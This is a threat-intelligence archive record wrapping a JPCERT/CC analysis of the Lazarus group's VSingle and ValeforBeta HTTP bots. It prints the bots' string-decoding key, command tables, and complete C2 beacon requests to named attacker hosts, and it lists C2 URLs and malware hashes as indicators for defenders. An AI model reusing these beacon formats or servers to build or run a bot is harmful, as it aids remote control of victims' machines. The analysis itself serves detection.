{ "id": "061929b5-acaa-4c80-af42-cca5a9518fd2", "created_at": "2026-04-06T00:21:56.037041Z", "updated_at": "2026-04-10T13:11:29.948587Z", "deleted_at": null, "sha1_hash": "38bbcccb57987dc9471da4684601574024179fd6", "title": "Lazarus Attack Activities Targeting Japan (VSingle/ValeforBeta) - JPCERT/CC Eyes", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 874686, "plain_text": "Lazarus Attack Activities Targeting Japan (VSingle/ValeforBeta) -\r\nJPCERT/CC Eyes\r\nBy 朝長 秀誠 (Shusei Tomonaga)\r\nPublished: 2021-03-21 · Archived: 2026-04-05 15:27:11 UTC\r\nLazarus\r\nThe attack group Lazarus (also known as Hidden Cobra) conducts various attack operations. This article\r\nintroduces malware (VSingle and ValeforBeta) and tools used in attacks against Japanese organisations.\r\nVSingle overview\r\nVSingle is a HTTP bot which executes arbitrary code from a remote network. It also downloads and executes\r\nplugins.\r\nOnce launched, this malware runs Explorer and executes its main code through DLL injection. (Some samples do\r\nnot perform DLL injection.) The main code contains the following PDB path:\r\nG:\\Valefor\\Valefor_Single\\Release\\VSingle.pdb\r\nThe next sections describe VSingle's obfuscation technique and communication format.\r\nVSingle obfuscation technique\r\nMost of the strings in VSingle are obfuscated. Figure 1 shows the code to disable obfuscation. A fixed key value\r\n(o2pq0qy4ymcrbe4s) decodes the strings by XOR.\r\nhttps://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html\r\nPage 1 of 12\n\nFigure 1: Code to disable obfuscation in VSingle\r\nBelow is some parts of decoded strings:\r\n[+] Download Parameter Error\r\n[+] Download Result\r\n[+] Upload Result\r\n[+] Upload Parameter Error\r\n[+] Interval\r\n Interval was set to\r\n[+] Plugin Download Result\r\n[+] Update\r\n[+] Info\r\n[+] Uninstall\r\n Valefor was uninstalled successfully.\r\n[+] Executable Download Result\r\n[+] Executable Download Parameter Error\r\nufw=%s\u0026uis=%u\r\ncmd.exe /c %s\r\n[%02d-%02d-%04d %02d:%02d:%02d]\r\n[+] Plugin Execute Result\r\nVSingle communication with C2 servers\r\nBelow is the HTTP GET request that VSingle sends to its C2 server at the beginning of the communication.\r\nGET /polo/[Unix time]/[random string].php?ufw=[Base64 data]\u0026uis=[unique ID] HTTP/1.1\r\nHost: maturicafe.com\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5\r\nhttps://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html\r\nPage 2 of 12\n\nAccept: text/html3,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n[Base64 data] contains the Base64-encoded value of \"[IP address]|[Windows version number]|[version]\". As a\r\nresponse to this request, AES-encrypted data including commands is downloaded from the server. The encryption\r\nkey is specified in Set-Cookie header in the response.\r\nVSingle also works with authentication proxy (Basic authentication). If the malware contains proxy settings, it can\r\ncommunicate in proxy environment as follows:\r\nGET https://maturicafe.com/polo/[Unix time]/[random string].php?ufw=[Base64 data]\u0026uis=[unique ID] HTT\r\nHost: maturicafe.com\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5\r\nProxy-Connection: keep-alive\r\nProxy-Authorization: Basic [credential]\r\nPragma: no-cache\r\nCache-Control: no-cache\r\nVSingle functions\r\nVSingle has 8 simple functions as listed below:\r\nTable 1: VSingle commands\r\nCommand number Contents\r\n1 Upload file\r\n2 Set communication interval\r\n3 Execute arbitrary command\r\n4 Download/execute plugin\r\n5 Update\r\n6 Send malware information\r\n7 Uninstall\r\n8 Download file\r\nIt executes the following 4 types of plugins:\r\nhttps://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html\r\nPage 3 of 12\n\nWindows PE file (saved as a .tmp file)\r\nVBS file (saved as a .vbs file)\r\nBAT file (saved as a .bat file)\r\nShellcode\r\nFigure 2 shows a part of the code to execute a plugin.\r\nFigure 2: Part of VSingle code to execute a plugin\r\nPlugins are temporarily saved in %TEMP% folder and then executed except for the shellcode ones; They are\r\nsaved in %TEMP% folder but loaded and executed on memory.\r\nWhen the command number 6 (sending malware information) is selected, the data in Figure 3 is sent. As for the\r\nversion number, 4.1.1, 3.0.1 and others have been confirmed in addition to 1.0.1. It is possible that this number\r\nindicates some sort of identifier, rather than its malware version.\r\nhttps://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html\r\nPage 4 of 12\n\nFigure 3: Sample information send with command number 6\r\nValeforBeta overview\r\nValeforBeta is a HTTP bot developed in Delphi, and its functions are even simpler than those of VSingle. Besides\r\narbitrary code execution from remote network, it just uploads and downloads files.\r\nThe next sections describe ValeforBeta's configuration and communication format.\r\nValeforBeta configuration\r\nFigure 4 shows the code to load the configuration. It contains sample ID (\"512\" in Figure 4), access type and\r\nintervals, as well as C2 server information.\r\nFigure 4: ValeforBeta configuration\r\nThere are 3 different access types:\r\nConnect directly (INTERNET_OPEN_TYPE_DIRECT)\r\nUse default setting (INTERNET_OPEN_TYPE_PRECONFIG)\r\nhttps://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html\r\nPage 5 of 12\n\nConnect via proxy (INTERNET_OPEN_TYPE_PROXY)\r\nValeforBeta communication with C2 servers\r\nBelow is the HTTP POST request that ValeforBeta sends to its C2 server at the beginning of the communication.\r\nPOST /doc/total.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: JSESSIONID=[Base64 data]\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2\r\nHost: 3.90.97.16\r\nContent-Length: 0\r\nProxy-Connection: Keep-Alive\r\nPragma: no-cache\r\nAlthough it is a HTTP POST request, it does not contain any data to send. The Base64-encoded data after\r\n\"JSESSIONID=\" in the Cookie header contains the information of an infected host. Below is the format of\r\nBase64-encoded data.\r\n[8-letter random string][data][random string (4-12 letters)]\r\n[data] contains the version information of the malware and the IP address of the infected hosts. (See request type\r\n\"0\" in Appendix A for more details.) If the response from the server is \"200 OK\", the next request is sent (Request\r\ntype \"1\").\r\nThe C2 server sends data including commands. The result of the command execution is sent as a part of the HTTP\r\nPOST request, disguised as a BMP file. Figure 5 shows part of the code to send the command execution result.\r\nhttps://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html\r\nPage 6 of 12\n\nFigure 5: ValeforBeta's code to send command execution result\r\nValeforBeta functions\r\nValeforBeta has only 6 functions as listed in Table 2.\r\nTable 2: ValeforBeta commands\r\nCommand\r\nnumber\r\nContents\r\n1 Download file\r\n2 Upload file\r\n3 Execute arbitrary shell command\r\n4\r\nUninstall (Executes cmd /c ping -n 4 127.0.0.1 \u003eNUL \u0026 echo VFB \u003e \"file name of\r\nitself\")\r\n6 Set Sleep Time\r\n7 Send system information\r\nhttps://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html\r\nPage 7 of 12\n\nThe command execution result is XOR-encoded. Figure 6 shows the decoded string of data sent with command\r\nnumber 7 (sending system information).\r\nFigure 6: Sample data sent by ValeforBeta\r\nTools used after intrusion\r\nThe attackers use the following 3 tools in this operation in order to relay communication with C2 server.\r\n3Proxy\r\nStunnel\r\nPlink\r\nIn closing\r\nhttps://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html\r\nPage 8 of 12\n\nWe introduced malware and tools that Lazarus used in the operation against Japanese organisations. We will\r\nprovide an update if we find new types of malware.\r\nThe C2 servers connected to the samples described in this article are listed in Appendix B. Please make sure that\r\nnone of your devices is communicating with them.\r\nShusei Tomonaga\r\n(Translated by Yukako Uchida)\r\nAppendix A: Data sent by ValeforBeta\r\nTable A: Format of data sent\r\nOffset Length Contents\r\n0x00 1\r\nRequest type\r\n(0: Send client data, 1: Request a command, 2: Send command execution result)\r\n0x01 4 Client ID (generated from hostname, username, OS install date/time and MAC address)\r\n0x05 3 Malware version\r\n0x08 4 IP address\r\n0x0C 3 OS version\r\nData after 0x05 is XOR-encoded and added only for the request type \"0\".\r\nAppendix B: C2 servers\r\nhttp://aquagoat.com/customer\r\nhttp://blacktiger.com/input\r\nhttp://bluedog.com/submit\r\nhttp://coraltiger.com/search\r\nhttp://goldtiger.com/find\r\nhttp://greentiger.com/submit\r\nhttp://industryarticleboard.com/evolution\r\nhttp://industryarticleboard.com/view\r\nhttp://maturicafe.com/main\r\nhttp://purplefrog.com/remove\r\nhttp://whitedragon.com/search\r\nhttps://coralcameleon.com/register\r\nhttps://industryarticleboard.com/article\r\nhttps://maturicafe.com/polo\r\nhttps://salmonrabbit.com/login\r\nhttps://whitecameleon.com/find\r\nhttps://whiterabbit.com/input\r\nhttps://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html\r\nPage 9 of 12\n\nhttp://toysbagonline.com/reviews\r\nhttp://purewatertokyo.com/list\r\nhttp://pinkgoat.com/input\r\nhttp://yellowlion.com/remove\r\nhttp://salmonrabbit.com/find\r\nhttp://bluecow.com/input\r\nhttp://www.karin-store.com/data/config/total_manager.php\r\nhttp://katawaku.jp/bbs/data/group/group-manager.php\r\nhttp://3.90.97.16/doc/total.php\r\nAppendix C: Malware hash value\r\n487c1bdb65634a794fa5e359c383c94945ce9f0806fcad46440e919ba0e6166e\r\neb846bb491bea698b99eab80d58fd1f2530b0c1ee5588f7ea02ce0ce209ddb60\r\n朝長 秀誠 (Shusei Tomonaga)\r\nSince December 2012, he has been engaged in malware analysis and forensics investigation, and is especially\r\ninvolved in analyzing incidents of targeted attacks. Prior to joining JPCERT/CC, he was engaged in security\r\nmonitoring and analysis operations at a foreign-affiliated IT vendor. He presented at CODE BLUE, BsidesLV,\r\nBlackHat USA Arsenal, Botconf, PacSec and FIRST Conference. JSAC organizer.\r\nRelated articles\r\nMultiple Threat Actors Rapidly Exploit React2Shell: A Case Study of Active Compromise\r\nhttps://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html\r\nPage 10 of 12\n\nUpdate on Attacks by Threat Group APT-C-60\r\nCrossC2 Expanding Cobalt Strike Beacon to Cross-Platform Attacks\r\nhttps://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html\r\nPage 11 of 12\n\nMalware Identified in Attacks Exploiting Ivanti Connect Secure Vulnerabilities\r\nTempted to Classifying APT Actors: Practical Challenges of Attribution in the Case of Lazarus’s Subgroup\r\nSource: https://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html\r\nhttps://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html\r\nPage 12 of 12\n\n https://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html \nUpdate on Attacks by Threat Group APT-C-60 \nCrossC2 Expanding Cobalt Strike Beacon to Cross-Platform Attacks\n Page 11 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "origins": [ "web" ], "references": [ "https://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html" ], "report_names": [ "Lazarus_malware3.html" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "15b8d5d8-32cf-408b-91b1-5d6ac1de9805", "created_at": "2023-07-20T02:00:08.724751Z", "updated_at": "2026-04-10T02:00:03.341845Z", "deleted_at": null, "main_name": "APT-C-60", "aliases": [ "APT-Q-12" ], "source_name": "MISPGALAXY:APT-C-60", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ab47428c-7a8e-4ee8-9c8e-4e55c94d2854", "created_at": "2024-12-28T02:01:54.668462Z", "updated_at": "2026-04-10T02:00:04.564201Z", "deleted_at": null, "main_name": "APT-C-60", "aliases": [ "APT-Q-12" ], "source_name": "ETDA:APT-C-60", "tools": [ "SpyGlace" ], "source_id": "ETDA", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434916, "ts_updated_at": 1775826689, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/38bbcccb57987dc9471da4684601574024179fd6.pdf", "text": "https://archive.orkl.eu/38bbcccb57987dc9471da4684601574024179fd6.txt", "img": "https://archive.orkl.eu/38bbcccb57987dc9471da4684601574024179fd6.jpg" } }